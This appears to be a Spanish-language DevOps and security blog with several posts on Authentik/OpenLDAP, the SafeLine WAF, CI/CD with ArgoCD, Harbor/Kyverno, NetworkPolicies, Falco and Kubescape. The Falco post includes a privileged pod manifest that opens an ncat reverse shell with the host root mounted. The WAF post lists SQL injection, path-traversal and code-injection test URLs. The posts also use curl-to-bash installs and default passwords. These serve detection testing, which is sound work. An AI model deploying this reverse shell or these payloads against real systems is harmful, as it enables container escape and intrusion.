      LDAP_LOG_LEVEL: "256"
      LDAP_ORGANISATION: "Example Inc."
      LDAP_DOMAIN: "esprueba.com"
      LDAP_BASE_DN: "dc=esprueba,dc=com"
      LDAP_ADMIN_PASSWORD: "admin"
      LDAP_CONFIG_PASSWORD: "config"
      LDAP_READONLY_USER: "false"
      #LDAP_READONLY_USER_USERNAME: "readonly"
      #LDAP_READONLY_USER_PASSWORD: "readonly"
      LDAP_RFC2307BIS_SCHEMA: "false"
      LDAP_BACKEND: "mdb"
      LDAP_TLS: "true"
      LDAP_TLS_CRT_FILENAME: "ldap.crt"
      LDAP_TLS_KEY_FILENAME: "ldap.key"
      LDAP_TLS_DH_PARAM_FILENAME: "dhparam.pem"
      LDAP_TLS_CA_CRT_FILENAME: "ca.crt"
      LDAP_TLS_ENFORCE: "false"
      LDAP_TLS_CIPHER_SUITE: "SECURE256:-VERS-SSL3.0"
      LDAP_TLS_VERIFY_CLIENT: "demand"
      LDAP_REPLICATION: "false"
      #LDAP_REPLICATION_CONFIG_SYNCPROV: 'binddn="cn=admin,cn=config" bindmethod=simple credentials="$$LDAP_CONFIG_PASSWORD" searchbase="cn=config" type=refreshAndPersist retry="60 +" timeout=1 starttls=critical'
      #LDAP_REPLICATION_DB_SYNCPROV: 'binddn="cn=admin,$$LDAP_BASE_DN" bindmethod=simple credentials="$$LDAP_ADMIN_PASSWORD" searchbase="$$LDAP_BASE_DN" type=refreshAndPersist interval=00:00:00:10 retry="60 +" timeout=1 starttls=critical'
      #LDAP_REPLICATION_HOSTS: "#PYTHON2BASH:['ldap://ldap.example.org','ldap://ldap2.example.org']"
      KEEP_EXISTING_CONFIG: "false"
      LDAP_REMOVE_CONFIG_AFTER_SETUP: "true"
      LDAP_SSL_HELPER_PREFIX: "ldap"
    tty: true
    stdin_open: true
    volumes:
      - /var/lib/ldap
      - /etc/ldap/slapd.d
      - /container/service/slapd/assets/certs/
    ports:
      - "389:389"
      - "636:636"
    # For replication to work correctly, domainname and hostname must be
    # set correctly so that "hostname"."domainname" equates to the
    # fully-qualified domain name for the host.
    domainname: "esprueba.com"
    hostname: "ldap-server"

  phpldapadmin:
    networks:
      - 'ldap-auth'
    image: osixia/phpldapadmin:latest
    container_name: phpldapadmin
    environment:
      PHPLDAPADMIN_LDAP_HOSTS: "openldap"
      PHPLDAPADMIN_HTTPS: "false"
    ports:
      - "8090:80"
    depends_on:
      - openldap

networks:
  ldap-auth:

volumes:
  database:
    driver: local
  redis:
    driver: local

Vamos a crear un archivo de variables de entorno. Se necesita generar una contraseña y una clave secreta. Utilice un generador de contraseñas seguro de su elección, como pwgen, o puede utilizar openssl de esta manera:

echo "PG_PASS=$(openssl rand -base64 36 | tr -d '\n')" >> .env
echo "AUTHENTIK_SECRET_KEY=$(openssl rand -base64 60 | tr -d '\n')" >> .env

En este archivo .env, también agregamos nuestro SMTP.

# SMTP Host Emails are sent to
AUTHENTIK_EMAIL__HOST=localhost
AUTHENTIK_EMAIL__PORT=25
# Optionally authenticate (don't add quotation marks to your password)
AUTHENTIK_EMAIL__USERNAME=
AUTHENTIK_EMAIL__PASSWORD=
# Use StartTLS
AUTHENTIK_EMAIL__USE_TLS=false
# Use SSL
AUTHENTIK_EMAIL__USE_SSL=false
AUTHENTIK_EMAIL__TIMEOUT=10
# Email address authentik will send from, should have a correct @domain
AUTHENTIK_EMAIL__FROM=authentik@localhost

Configuracion de OpenLDAP

Vamos a popular nuestro OpenLDAP.Para ello generamos un archivo .ldif que creara la OU=Groups, OU=People & un Grupo admins y un usuario de prueba UID=sfernandez.

# ou_usuarios.ldif
dn: ou=People,dc=esprueba,dc=com
objectClass: organizationalUnit
ou: People

dn: ou=Groups,dc=esprueba,dc=com
objectClass: organizationalUnit
ou: Groups

# Crear grupo de prueba
dn: cn=admins,ou=Groups,dc=esprueba,dc=com
objectClass: top
objectClass: posixGroup
gidNumber: 10000
cn: admins

# Crear usuario de prueba
dn: uid=sfernandez,ou=People,dc=esprueba,dc=com
objectClass: inetOrgPerson
objectClass: posixAccount
objectClass: top
uid: sfernandez
sn: Fernandez
givenName: Santiago
cn: Santiago Fernandez
displayName: Santiago Fernandez
uidNumber: 1001
gidNumber: 10000
homeDirectory: /home/sfernandez
userPassword: {SSHA}passwordhash

Antes de agregar la configuracion corremos el comando para generar la constrasena de sfernandez y luego lo pegamos en el ldif.

slappasswd

Modificamos el archivo donde dice userPassword.

ldapadd -x -D "cn=admin,dc=esprueba,dc=com" -W -f ou_usuarios.ldif -W

¡Listo! Ya tenemos al usuario sfernandez dentro de OU=People. Vamos a verificarlo.

Configuracion Authentik

Podemos ir a nuestro navegador favorito y acceder a Authentik.

Para la configuración inicial del usuario admin, deben ingresar al link: http://{IP_ADDRESS}:{PORT}/if/flow/initial-setup/.

username: akadmin

Hacemos el primer login para cambiar la contraseña.

LDAP como Identity Provider

Necesitamos que nuestro LDAP sea una fuente para nuestro manejador de identtidades.

Agregar OpenLDAP como Fuente

Vamos a Directorio, luego al apartado de Federacion y Social Login.

Logicamente vamos a configurar nuestro LDAP, como Source.

Vamos a identificarlo y dejar estas casillas activadas.

Para conocer la direccion IP de mi servidor LDAP, utilice este comando, sino pondemos el nombre del contenedor.

💡

docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' openldap

Mi configuracion quedo de esta manera.

Sincronizamos y listo.

Configurar Aplicaciones

Voy a configurar mi Proxmox para que sea utilizado como aplicacion dentro del enterno del usuario sfernandez. Para ello vamos a configurar en base al protocolo OAuth2/OpenID. Vamos a crear la aplicacion. Para ello iniciamos el Wizard. Yo deseo agregar Proxmox.

Selecciono el Single Sign On que utilizaremos.

Vamos a copiar los valores de Client ID & Client Secret.

Vamos a agregar la aplicacion al usuario, para que sea parte de sus aplicativos.

Logico en un ambiente real lo manejariamos por grupos.

Configuracion de Proxmox

Ya en Proxmox vamos a ir a Datacenter, luego a Realms y configurar el OpenID Connect Server.

Dejamos la configuracion de esta manera.

Inicio de Sesion

Ya todo listo para que sfernandez haga inicio de sesion en el portal de Authentik y aparezcan las aplicaciones asignadas para un comienzo ameno.

Referencias

https://docs.goauthentik.io/integrations

Combatiendo contra Crawlers & Bots

Santiago Fernandez — Sun, 18 Aug 2024 22:27:57 GMT

Introducción

¿Te diste cuenta la cantidad de tráfico que generan los Bots 🤖 & Crawlers 🕷️? ¿Lo medis? Segund Imperva el 49,6% del tráfico es automatizado.

Me genera preguntas ¿Cuanto de mas estamos pagando 💵 por nuestra infraestructura? Hace un tiempo escribí sobre Nginx como WAF, agregando ModSecurity, hoy me encuentro con un proyecto que me llamo la atencion como SafeLine. ¿Por que? Es un Web Application Firewall fácil de usar y muy eficaz, ya ha cosechado la cifra de 11,6 mil estrellas en GitHub. Diseñado para proteger los servicios web de los ataques de hackers, filtrando y monitorizando el tráfico HTTP entre las aplicaciones web e Internet. Estas métricas me dejaron pensando.

Un WAF ayuda a proteger las aplicaciones web filtrando y supervisando el tráfico HTTP entre una aplicación web e Internet. Normalmente protege las aplicaciones web de ataques como la inyección SQL, XSS, inyección de código, inyección de comandos, inyección CRLF, inyección ldap, inyección xpath, RCE, XXE, SSRF, path traversal, backdoor, bruteforce, http-flood, bot abused, entre otros.

Instalación de SafeLine

En mi caso voy a crear un maquina virtual para proteger mi aplicación, sobre un ambiente Kubernetes. Si quisieran desplegar directamente SafeLine, con Nginx Ingress, sobre un Cluster les recomiendo leer este artículo.

El waf tiene la 192.168.0.23 y entregara todo el trafico, analizado, a nuestro nodo Kubernetes en 192.168.0.22 que contiene app.esprueba.com. Vamos agregar en el waf la entrada DNS local.

Comenzamos con la instalación.

sudo bash -c "$(curl -fsSLk https://waf.chaitin.com/release/latest/setup.sh)"

Una vez instalado la consola nos entrega el usuario y password para empezar la configuración. Vamos apuntar nuestro Firewall a WAF, que hará de proxy reverso y luego el upstream al Kubernetes.

Asi estaba antes.

De esta manera quedara.

Creación de Certificado

En la pestana Web Services > Certificate > Add Cert

Agregamos un Web Service.

Ya tenemos nuestra aplicación protegida. Encendemos el Anti Bot y el Rate Limit. Tenemos gran cantidad de opciones a configurar.

Apenas publicado ya empieza a darnos datos.

Acá las reglas que ya estamos analizando por defecto.

Ataques

SQL Injection Attack: https://app.esprueba.com/?id=1+and+1=2+union+select+1
XSS Attack: https://app.esprueba.com/?id=
Path Traversal Attack: https://app.esprueba.com/?id=../../../../etc/passwd
Code Injection Attack: https://app.esprueba.com/?id=phpinfo();system('id')
XXE Attack: https://app.esprueba.com/?id=

Aca vemos la pantalla, que ve el atacante.

Mientras en nuestra consola.

La verdad que este proyecto es muy interesante. Me gustaria verlo en un ambiente productivo, el nivel de detalle. ¿El costo? 100US/M o 600US/Y. Poco.

Espero que les haya gustado y lo prueben.

Referencias

https://medium.com/@lulu.liu12345/boost-kubernetes-security-deploying-safeline-waf-with-ingress-nginx-09f7a19d985d

https://medium.com/@lulu.liu12345/safeline-the-open-source-waf-thats-gaining-traction-on-github-85e2243be39e

Un pipeline simple, pero efectivo. 😉

Santiago Fernandez — Wed, 14 Aug 2024 15:43:26 GMT

Introducción

Hace tiempo que no actualizo los proyectos DevOps del Blog, así que vamos a crear algo sencillo pero eficaz para aquellos que están haciendo sus primeras armas en este mundo.

Les comparto este proyecto para que puedan desplegarlo fácilmente en sus entornos. Un pipeline completo. Explicaremos cómo crear una imagen Docker y subirla a Docker Hub, utilizar un Helm Chart y modificarlo, automatizar estos procesos con GitHub Actions, para finalmente desplegarlo en nuestro Kubernetes via ArgoCD.

Aca el contenido del proyecto, pero tranquilos que vamos a ir paso a paso.

Creación de Imagen Docker

Vamos a crear local nuestra imagen docker, solo para probar que el Dockerfile está correcto y luego correrla en el puerto 8080.

¡Todo perfecto!

Repasamos los comandos.

# Construccion de Imagen, debemos estar en la carpeta app donde encontramos el Dockerfile
docker build . -t app
# Listar Imagenes
docker images
# Levantar el Contenedor 
docker run -it --rm -d -p 8080:80 app
# Status del Contenedor
docker ps

El primer paso está correcto. ¡Seguimos!

Despliegue en Kubernetes

Vamos a revisar los manifiestos y desplegar. En este caso ya tenemos la imagen en DockerHub, para esta prueba, algo que luego hara GitHub Actions no solo sera el build, si no también el push al registro.

Vamos a repasar los comandos.

# Creo el Namespace app
kubectl create namespace app
# Aplico los manifiestos
kubectl apply -f .
# Revisamos el Ingress
kubectl get ingress -n app
# Listamos los artefactos del Namespace app
kubectl get all -n app

¿Le pegamos una mirada a cada manifiesto, dentro de k8s/manifest?

Primero el deployment.yaml que referencia a la imagen subida a DockerHub.

apiVersion: apps/v1
kind: Deployment
metadata:
  name: app
  namespace: app
  labels:
    app: app
spec:
  replicas: 1
  selector:
    matchLabels:
      app: app
  template:
    metadata:
      labels:
        app: app
    spec:
      containers:
      - name: app
        image: safernandez666/app # Cambiar por tu imagen en DockerHub
        ports:
        - containerPort: 80

Segundo el service.yaml.

apiVersion: v1
kind: Service
metadata:
  name: app
  namespace: app
  labels:
    app: app
spec:
  ports:
  - port: 80
    targetPort: 80
    protocol: TCP
  selector:
    app: app
  type: ClusterIP

Y por último el ingress.yaml, que referencia la FQDN que queremos resolver.

apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
  name: app
  namespace: app
  annotations:
    nginx.ingress.kubernetes.io/rewrite-target: /
spec:
  ingressClassName: nginx
  rules:
  - host: app.esprueba.com
    http:
      paths:
      - path: /
        pathType: Prefix
        backend:
          service:
            name: app
            port:
              number: 80

⚠️ Es necesario que tengamos desplegado ingress en nuestro cluster.

La resolucion, para esta prueba, del FQDN la hice modificando mis registro local apuntando a mi cluster de Kubernetes. Dependiendo de la plataforma se hace de diferente manera, si estás tocando Clusters seguramente sepas hacerlo. Si no sabes me avisas 📞 y te guio.

CI con GitHub Actions

Vamos al corazón de esta automatización. El manifiesto de GitHub Actions. Antes que nada vamos a sumar los secretos de DockerHub en las variables. Para ello en tu repositorio, debes hacer lo siguiente.

Vamos a cargar las variables de inicio para el login en DockerHub, una vez cargados los secretos, vamos modificar los permisos de GITHUB_TOKEN para poder escribir, desde la GitHub Actions en el YAML del Helm Chart.

Ahora si revisamos el Workflow que se puede generar desde acá.

name: Build and Push Docker Image to Docker Hub

on: 
  push:
    branches:
      - master
    paths-ignore: # Si realizamos cambios, aqui, no se dispara el pipeline.
      - 'k8s/**'
      - 'README.md'

jobs:
  build-and-update: # Construccion de la Imagen & Push en DockerHub
    name: Build Image and Update Helm Chart
    runs-on: ubuntu-latest
    steps:
      - name: Check out the repository
        uses: actions/checkout@v4

      - name: Set up QEMU
        uses: docker/setup-qemu-action@v3

      - name: Set up Docker Buildx
        uses: docker/setup-buildx-action@v3

      - name: Log in to Docker Hub
        uses: docker/login-action@v3
        with:
          username: ${{ secrets.DOCKERHUB_USERNAME }}
          password: ${{ secrets.DOCKERHUB_TOKEN }}
        # Agregamos el TAG para subir no solo latest, si no tambien la version.
      - name: Extract version number from GIT SHA
        id: extract_sha
        run: echo "BUILD_TAG=${GITHUB_SHA::7}" >> $GITHUB_ENV

      - name: Build and push Docker image
        uses: docker/build-push-action@v5
        with:
          context: app/
          push: true
          tags: safernandez666/app:latest, safernandez666/app:${{ env.BUILD_TAG }}

      - name: Update tag in Helm Chart # Cambiamos por el numero de version el values.yaml
        run: |
          sed -i 's/tag: .*/tag: "${{ env.BUILD_TAG }}"/' app-chart/values.yaml

      - name: Commit and push changes
        run: |
          git config --global user.email "santiagoagustinfernandez@gmail.com"
          git config --global user.name "Santiago Fernandez"
          git add app-chart/values.yaml
          git commit -m "Update tag to '${{ env.BUILD_TAG }}' after building image"
          git push
        env:
          GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}  # Usando el token para autenticar el push

Perfecto, vamos a realizar un cambio para ver como interactua. Modificamos el archivo values.yaml para actualizar la etiqueta con el número de versión después de construir la imagen. Ahora ponemos latest solo para ver el cambio 😎.

¡Hacemos el commit!

¡Excelente!

Se está realizando el Build y Subiendo a DockerHub. ¡Miremos le Job a detalle! Se modifico el archivo app-chart/values.yaml con el tag:4044587.

Revisemos el archivo del Helm Chart y el registro.

Todo está funcionando como queremos. Ahora solo nos queda instalar ArgoCD para desplegar la versión que deseamos.

CD con ArgoCD

¿Que es ArgoCD? No es ni más ni menos que una herramienta de despliegue continuo que nos permite automatizar el despliegue y la gestión de sus aplicaciones utilizando Git como una única fuente de verdad

Instalación de ArgoCD

Creamos el Namespace y descargamos los manifiestos.

kubectl create namespace argocd
kubectl apply -n argocd -f https://raw.githubusercontent.com/argoproj/argo-cd/stable/manifests/install.yaml

Ahora nos queda, para facilitar el ingreso, cambiar el servicio por LoadBalancer.

kubectl patch svc argocd-server -n argocd -p '{"spec": {"type": "LoadBalancer"}}'
kubectl get svc argocd-server -n argocd

Obtenemos la dirección IP y por último necesitar el password para el usuario admin, con este comando podemos conocerlo.


kubectl get svc argocd-server -n argocd
kubectl -n argocd get secret argocd-initial-admin-secret -o jsonpath="{.data.password}" | base64 -d

Configuración de ArgoCD

Conectamos nuestro repositorio de GitHub.

Creamos un proyecto donde configuramos la fuente y con qué Cluster vamos a trabajar.

Ahora el paso final, crear la aplicación con algunas configuraciones básicas.

¡Uala! Ya tenemos el aplicativo sincronizado.

Cada vez que ArgoCD detecte un cambio en el repositorio hará el despliegue del Helm Chart, con la última versión de build que generamos.

Te dejo un video, para que lo veas en acción.

https://youtu.be/D4A3TzFBQPg

Espero que te sirva para comenzar en el mundo DevOps.

Saludos.

Harbour como Registro de Imágenes y Kyverno para forzar políticas

Santiago Fernandez — Wed, 24 Jul 2024 15:38:49 GMT

Hace unos meses nos preguntamos: ¿Sabemos qué imágenes usamos en nuestros entornos? ¿Son las que fueron aprobadas por Seguridad? ¿Podría un atacante desplegar imágenes adulteradas? Hicimos esta entrada en el blog donde creamos políticas en nuestro clúster Kubernetes con Kyverno para permitir solo el despliegue de imágenes firmadas y aprobadas por Seguridad. No es nada nuevo decir que la seguridad es como una capa de cebolla, así que me pregunté: ¿Y si alojamos el Registro de Imágenes? ¡Manos a la obra!

Para ello, vamos a usar Harbour, un registro open source que ofrece una variedad de características, como escaneo, firma, autenticación, auditoría, etc. Además, acercamos estas imágenes a nuestro entorno en tiempo de ejecución.

Instalación de Harbor

Primero deberíamos tener nginx ingress para poder consumir la instalación de Harbour. Vamos a pegar una mirada a nuestro cluster.

Vamos agregar los helm's necesarios y editar alguna linea, para configurar la interfaz a consumir.

helm repo add harbor https://helm.goharbor.io

Vamos a descargar el helm para editar esos archivos.

helm fetch harbor/harbor --untar

Deberíamos poder abrir un editor y ver estos archivos.

Edito el FQDN que voy a utilizar, de manera local.

Ahora si instalamos.

helm install harbor ./harbor -n harbor --create-namespace

Vamos a ver el ingress y apunto la resolucion local al Cluster de Kubernetes.

Vamos a probar el ingreso, con las credenciales por defecto.

Username: admin
Password: Harbor12345

¡Perfecto! Ya tenemos nuestro servidor de registro listo.

Creación de Proyecto

Vamos a crear un proyecto, llamado blog.

Push Imagen Local

Ahora que tenemos nuestro registro de imágenes, vamos a subir una imagen a Harbor. Para ello, necesitamos autenticarnos.

En nuestro caso, como tenemos un certificado no válido, vamos a configurar el Engine de Docker para aceptar un registro no estándar. Esto no es seguro, pero para nuestra prueba de concepto, es suficiente.

Agregamos la sentencia

  "insecure-registries": [
    "harbor.esprueba.com"
  ]

Y reiniciamos Docker.

Ahora si podemos autenticarnos.

Vamos a descargar la imagen de Nginx, luego la "etiquetamos" y la subimos a Harbor.

Listo, ya está en el servidor de imagenes.

Policy as a Code

Podemos verla en la entrada que les comente al principio, si no estaremos el paso a paso aca. Una vez instalado vamos a crear una política que solo acepte imágenes de nuestra instancia de Harbor en un Namespace específico.

Instalación Kyverno

Vamos a agregar el repositorio de helm para luego instalarlo.

helm repo add kyverno-repo https://kyverno.github.io/kyverno/
helm install kyverno kyverno-repo/kyverno -n kyverno-ns --create-namespace

¡Listo! Ya tenemos Kyverno en el clúster con todos sus componentes.

Creación Política

Vamos a crear la política que comentamos anteriormente, para que solo acepte imagenes de Harbor y se pueda deployar en el namespace nginx-app.

apiVersion : kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: check-images
spec:
  validationFailureAction: Enforce
  background: false
  rules:
  - name: check-registry
    match:
      any:
      - resources:
          kinds:
          - Pod
          namespaces:
          - nginx-app

    preconditions:
      any:
      - key: "{{request.operation}}"
        operator: NotEquals
        value: DELETE
    validate:
      message: "unknown registry"
      foreach:
      - list: "request.object.spec.initContainers"
        pattern:
          image: "harbor.esprueba.com/*"
      - list: "request.object.spec.containers"
        pattern:
          image: "harbor.esprueba.com/*"

Vamos a crear un deployment para la prueba de concepto, usando una imagen de DockerHub. Si todo ha salido bien, no debería poder hacer el deployment.

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx
  namespace: nginx-app
spec:
  selector:
    matchLabels:
      app: nginx
  replicas: 1
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: nginx:alpine
        ports:
        - containerPort: 80

Excelente! No se está pudiendo crear el contenedor porque Kyverno lo esta parando.

Ahora si, vamos a ver si el registro es Harbor que pasa.

apiVersion: apps/v1
kind: Deployment
metadata:
  name: nginx
  namespace: nginx-app
spec:
  selector:
    matchLabels:
      app: nginx
  replicas: 1
  template:
    metadata:
      labels:
        app: nginx
    spec:
      containers:
      - name: nginx
        image: harbor.esprueba.com/blog/nginx:alpine
        ports:
        - containerPort: 80

Listo se estan creando los contenedores. La política de Kyveno que creamos permite que las imagenes de harbor.esprueba.com/blog/nginx:alpine se desplieguen en el namespace nginx-app.

Espero que les sirva, nos vemos en la próxima entrada.

Networking Security para Kubernetes

Santiago Fernandez — Wed, 17 Jul 2024 16:30:08 GMT

Introducción

No descubrimos nada al decir que las políticas de networking son esenciales para asegurar y manejar el tráfico dentro de nuestro cluster. Nos habilitan a controlar la comunicación entre pods, mejorar la seguridad, proveer un control granular del tráfico en estos ambientes escalables como nuestros clusters de Kubernetes. La manera de mantener una infraestructura segura y eficiente.

Ambiente

En esta entrada vamos a descubrir algunas políticas a implementar, para ello sera necesario crear un ambiente. Elegí este proyecto que tiene 2 tiers, un Backend con MySQL y un Frontend con Flask. Dejó el proyecto, para que puedan crear el ambiente.

Vamos a ver que tenemos en el cluster.

Debería verse algo así.

Vamos a generar las políticas necesarias para asegurar este aplicativo. La idea es que solo el Frontend atienda las consultas.

Políticas

1.Default Deny All Ingress and Egress

Esta política es una medida de seguridad básica, donde vamos a impedir todo el tráfico de entrada y salida a los pods, actua como un firewall que bloquea todo el tráfico salvo que especifiquemos lo contrario. Es una buena practica bloquear todo el trafico e ir gradualmente añadiendo reglas que permitan las comunicaciones necesarias.

Para implementar una política de negación, por defecto, debemos crear un objeto NetworkPolicy. En este caso aplicará sobre el namespace default y denegaremos el ingreso y egreso.

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: default-deny-all
  namespace: default
spec:
  podSelector: {}
  policyTypes:
  - Ingress
  - Egress

Perfecto, ya no podemos ingresar a nuestra aplicación.

2.Allow Frontend to 0.0.0.0

Vamos agregar una política para que solo pueda consumirse el frontend.

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-two-tier-app
  namespace: default
spec:
  podSelector:
    matchLabels:
      app: two-tier-app
  policyTypes:
  - Ingress
  - Egress
  ingress:
  - from:
    - ipBlock:
        cidr: 0.0.0.0/0
  egress:
  - to:
    - ipBlock:
        cidr: 0.0.0.0/0

¿Que está pasado? Ahora si podemos ingresar al frontend, pero el frontend no logra conectarse con el backend. Afinamos una nueva política, para que tengamos conexión a la Base de Datos. Vamos a crear dos políticas, una para que two-tier-app se comunique con mysql en el puerto 3306 y otra para que mysql pueda devolver el resultado a two-tier-app.

Primero veamos los labels, para trabajar mejor.

3.Allow Frontend to Backend

Ahora si creamos las políticas. La primera permitimos la comunicación de two-tier-app a mysql en el puerto 3306.

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-two-tier-app-to-mysql
  namespace: default
spec:
  podSelector:
    matchLabels:
      app: mysql
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: two-tier-app
    ports:
    - protocol: TCP
      port: 3306

La segunda, permitimos que mysql retorne el resultado.

apiVersion: networking.k8s.io/v1
kind: NetworkPolicy
metadata:
  name: allow-mysql-to-two-tier-app
  namespace: default
spec:
  podSelector:
    matchLabels:
      app: two-tier-app
  policyTypes:
  - Ingress
  ingress:
  - from:
    - podSelector:
        matchLabels:
          app: mysql
    ports:
    - protocol: TCP
      port: 3306

¡Listo! Ya podemos acceder a la aplicación, que ahora se comunica con la base de datos. Sin embargo, ningún pod, excepto la aplicación, puede conectarse con el exterior.

Vamos a hacer una prueba desde los diferentes containers. Si hacemos un curl desde el Frontend, vamos a obtener esta respuesta.

Pero si lo hacemos desde el Backend, el resultado será diferente porque solamente el label two-tier-app tiene permisos para las comunicaciones con el exterior.

Existen muchas clases de políticas para mejorar la seguridad, como conexiones entre namespaces, restriccion de rangos, manejar comunicaciones atraves de labels, combinaciones entre Pods y Namespaces, etc.

Espero que les sirva para dar los primeros pasos en esta clase de objetos tan necesarios.

Runtime Security con Falco

Santiago Fernandez — Fri, 07 Jun 2024 22:04:01 GMT

Introducción

Falco es una herramienta de código abierto diseñada para proporcionar seguridad a las aplicaciones que se ejecutan en su clúster Kubernetes. Utiliza un conjunto de reglas para supervisar actividades y comportamientos con el fin de detectar posibles brechas de seguridad. Esta herramienta es una buena opción para una estrategia de defensa en profundidad.

Falco detecta amenazas en tiempo real, revisa y monitorea comportamientos en Nodos, Pods, Aplicaciones o la API de Kubernetes. Lo hace utilizando la información de las llamadas del sistema a Linux y los registros de auditoría de Kubernetes.

¿Que podemos detectar?

Por ejemplo estos serían unos casos de uso, interesantes:

Escalada de privilegios usando contenedores privilegiados
Intento de escape de contenedor cambiando namespaces de linux
Mutando Configmap con credenciales privadas
Mutando recursos en el espacio de nombres kube-system
Un nodo no confiable intentando unirse al cluster
Lecturas/Escrituras en directorios bien conocidos como /etc, /usr/bin, /usr/sbin, etc.
Cambios de propiedad y modo Linux
Conexiones de red inesperadas o mutaciones de socket
Creación de procesos mediante execve o ejecución de binarios de shell
Mutaciones en los ejecutables coreutils de Linux
Mutaciones de binarios de inicio de sesión

Un ataque clásico que podamos detectar puede ser el siguiente:

El atacante explota un RCE o Remote Code Execution en un aplicativo dentro del Pod.
Crea un Shell remoto, que puede ser detectado por la ejecución inesperada del mismo o una conexión de red.
Explora el sistema de archivos, donde podríamos evidenciar que esta "scroleando" por /etc y /usr.
Un descubrimiento de credenciales de Kubernetes.
Por último la creación de un contenedor privilegiado con propiedades de Root, que podríamos detectar por la creación del contenedor o el cambio de namespace.

Instalación de Falco vía Helm

Debes tener helm en tu host para poder hacer el deployment, en mi caso voy a usar mi cluster minikube. Lo voy a dejar por defecto, pero no seria mala idea hacerlo sobre un namespace específico.

## Add the stable chart to Helm repository
helm repo add falcosecurity https://falcosecurity.github.io/charts
helm repo update

Hacemos el deployment de Falco, con Falcosidekick alimentando un Channel de Slack con solo los Warnings.

helm install falco -n falco falcosecurity/falco \
  --set driver.kind=modern-bpf \ 
  --set falcosidekick.enabled=true \
  --set falcosidekick.webui.enabled=true \
  --set auditLog.enabled=true \
  --set falco.jsonOutput=true \
  --set falco.fileOutput.enabled=true \
  --set falcosidekick.config.slack.webhookurl="https://hooks.slack.com/services/XXX" \
  --set falcosidekick.config.slack.minimumpriority="Warning" \
  --create-namespace

Si quisieras saber como crear el webhook para que sidekick informe en Slack, te dejo este enlace.

Podrias revisar Falco con falcosidekick haciendo un Proxy, como te detallo a continuación.

kubectl port-forward -n falco service/falco-falcosidekick-ui 2802:2802

Luego con admin/admin en http://localhost:2802

Ya tenemos todo el stack listo. Hay muchas más cosas para jugar, por ejemplo: ¿Por qué no llevarlo a grafana? Para ello deberías leer sobre falco-exporter.

Simular Actividad Maliciosa

Vamos a crear un pod, para ver qué nos dice falco.

kubectl run alpine --image alpine -- sh -c "sleep infinity"

Uala! Slack enseguida nos avisa de que se levanto un container de manera no estipulada.

Podemos ver la alarma en Falcosidekick, logico.

Ahora vamos a desplegar un manifiesto que tiene un NetCat a ver que pasa 😉. Aca dejo el manifiesto, que lo voy a guardar como deploy.yaml.

apiVersion: v1
kind: Pod
metadata:
  name: everything-allowed-revshell-pod
  labels:
    app: pentest
spec:
  hostNetwork: true
  hostPID: true
  hostIPC: true
  containers:
  - name: everything-allowed-pod
    image: raesene/ncat
    command: [ "/bin/sh", "-c", "--" ]
    args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ]
    securityContext:
      privileged: true
    volumeMounts:
    - mountPath: /host
      name: noderoot
  volumes:
  - name: noderoot
    hostPath:
      path: /

Aplicamos el manifiesto.

kubectl apply -f deploy.yaml

Uala! Peligro! Falco nos comenta que tenemos un contendor en nuestro nodo que tiene propiedades para crear una conexión remota.

La herramienta tiene infinidad de reglas para jugar. Si no lo comente se puede usar en Kubernetes o en On Premise. Aca podes revisar las reglas.

Respuesta a Incidentes

Hay muchas formas de responder a un incidente. Para que sigan explorando, les dejo este documento donde, utilizando Serverless, podemos responder a un evento de seguridad mediante un trigger. En el caso que presenté, levantar un contenedor con una imagen que no está homologada por nosotros, podemos usar una estrategia proactiva como lo que comento aquí, donde firmamos las imágenes con CoSign y Kyverno se encarga de prohibir el "pull" vía Admission Controller dentro de nuestro Cluster.

Referencias

https://security.padok.fr/en/blog/falco-discovery

https://medium.com/oracledevs/malicious-activity-detection-in-kubernetes-using-falco-and-opensearch-in-oracle-cloud-part-3-d41b3b2006c8

https://medium.com/@selvamraju007/falco-introduction-and-installation-demo-on-kubernetes-b6b75d756914

Detección de Amenazas en Kubernetes con Kubescape

Santiago Fernandez — Fri, 12 Apr 2024 16:59:56 GMT

Resolviendo análisis de riesgo, malas configuraciones, seguridad, en nuestro Cluster. Una manera de salvar un tiempo valioso, como administrador.

No es novedad que Kubernetes es parte de nuestro dia a dia, que pocas empresas están fuera de la contenerización de aplicativos. Estos ambientes son complejos y nos acarrean un montón de desafíos en temas de Seguridad.

Para tener una postura fuerte es crítico implementar controles que nos aporten visibilidad sobre posibles vulnerabilidades o malas configuraciones en nuestro ambiente.

Vamos a instalar Kubescape, junto con Prometheus y Grafana para construir una solución que pueda llevar los hallazgos a otro nivel. Si nunca montaste observabilidad en tu cluster, te dejo esta entrada sobre armamos algo básico.

Instalación de Cliente de Kubescape

Con este comando podemos instalar el cliente de Kubescape.

curl -s https://raw.githubusercontent.com/kubescape/kubescape/master/install.sh | /bin/bash

Vamos a realizar el primer scanneo, para ver nuestro punto de partida. Utilizaré el framework de NSA y filtrare algunos namespaces. Hay bastantes frameworks para seleccionar en base a tus necesidades de cumplimiento.

kubescape scan framework nsa --exclude-namespaces kube-system,kube-public

Lo bueno de Kubescape es que podemos agregarlo a nuestro pipeline para realizar escaneos hasta en manifiestos. Podemos tener un enfoque proactivo o reactivo.

Instalación en el Cluster Kubernetes

Ahora llegó el momento de la mejora continua, nada mejor que un monitoreo continuo. Ya tenemos nuestro cluster con Prometheus & Grafana, ahora integremos a Kubescape. Si no te dejo el comando para agregar el stack.

helm repo add prometheus-community https://prometheus-community.github.io/helm-charts
helm repo update
kubectl create namespace prometheus
helm install -n prometheus kube-prometheus-stack prometheus-community/kube-prometheus-stack --set prometheus.prometheusSpec.podMonitorSelectorNilUsesHelmValues=false,prometheus.prometheusSpec.serviceMonitorSelectorNilUsesHelmValues=false

Nota: Si ya tenemos instalado Prometheus, deberíamos hacer algunas parametrizaciones como las que dejo abajo con un upgrade sobre el helm, si es que fue tu manera de desplegar.

